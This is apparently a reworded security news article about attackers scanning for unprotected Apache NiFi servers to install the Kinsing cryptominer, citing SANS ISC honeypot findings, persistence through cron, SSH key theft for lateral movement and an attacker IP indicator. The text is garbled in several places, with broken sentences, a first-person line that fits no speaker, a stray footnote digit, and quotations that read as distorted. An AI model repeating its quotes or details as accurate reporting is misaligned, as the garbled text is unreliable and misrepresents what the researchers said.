Financially motivated attackers are actively scouring the Internet for unprotected information. Apache NiFi instance It secretly installs cryptocurrency miners and facilitates lateral movement.
This finding comes from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests to “/nifi” on May 19, 2023.
“Persistence is achieved through timed processors or entries in cron.” Said Dr. Johannes Ulrich, Research Director, SANS Technology Institute. “Attack scripts are not stored on the system. Attack scripts are stored only in memory.”
The honeypot configuration causes ISC to open a shell where the first scaffold deletes the “/var/log/syslog” file, disables firewalls, and exits competing crypto-mining tools before downloading and launching Kinsing. I was able to determine that it was weaponized to drop scripts. Malware from remote servers.
In September 2022, Trend Micro detailed an identical attack chain that leveraged older flaws in Oracle WebLogic Server (CVE-2020-14882 and CVE-2020-14883) to distribute cryptocurrency mining malware.
Zero Trust + Deception: Learn How to Outsmart Attackers!
See how Deception can detect advanced threats, stop lateral movement, and strengthen your Zero Trust strategy. Join us for an insightful webinar!
A selective attack launched by the same threat actor against a public NiFi server was designed to harvest SSH keys from infected hosts in order to connect to other systems within the victim’s organization2. It also entails executing a second shell script.
A notable indicator of the ongoing campaign is the actual attack and scanning activity being conducted via IP address 109.207.200.[.]43 for port 8080 and port 8443/TCP.
“Being used as a data processing platform, NiFi servers often access business-critical data,” said SANS ISC. “NiFi servers can be attractive targets because they are configured with larger CPUs to support data conversion tasks. NiFi servers are not secure. ”